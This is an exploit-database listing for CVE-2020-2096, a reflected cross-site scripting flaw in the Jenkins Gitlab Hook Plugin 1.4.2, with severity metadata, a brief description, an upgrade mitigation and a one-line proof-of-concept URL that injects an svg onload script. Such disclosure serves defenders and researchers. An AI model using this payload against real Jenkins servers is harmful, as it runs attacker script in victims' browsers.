header-logo
Suggest Exploit
vendor:
Gitlab Hook Plugin
by:
Ai Ho
6.1
CVSS
MEDIUM
Reflected Cross-Site Scripting
79
CWE
Product Name: Gitlab Hook Plugin
Affected Version From: 1.4.2
Affected Version To: 1.4.2
Patch Exists: YES
Related CWE: CVE-2020-2096
CPE: 2.3:a:jenkins:jenkins_gitlab_hook_plugin:1.4.2
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2020

Jenkins Gitlab Hook Plugin 1.4.2 – Reflected Cross-Site Scripting

Jenkins Gitlab Hook Plugin 1.4.2 and earlier is vulnerable to Reflected Cross-Site Scripting. An attacker can exploit this vulnerability by sending a crafted URL to the victim. The crafted URL contains malicious JavaScript code which is executed in the victim's browser when the URL is clicked.

Mitigation:

Upgrade to version 1.4.3 or later
Source

Exploit-DB raw data:

# Exploit Title: Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting
# Exploit Author: Ai Ho
# Vendor Homepage : https://jenkins.io/
# Effective version : Gitlab Hook Plugin 1.4.2 and earlier
# References: https://jenkins.io/security/advisory/2020-01-15/
# CVE: CVE-2020-2096

# PoC:
http://JENKINS_IP/gitlab/build_now%3Csvg/onload=alert(document.domain)%3E

Navigation

Suggest Exploit

Services By CQR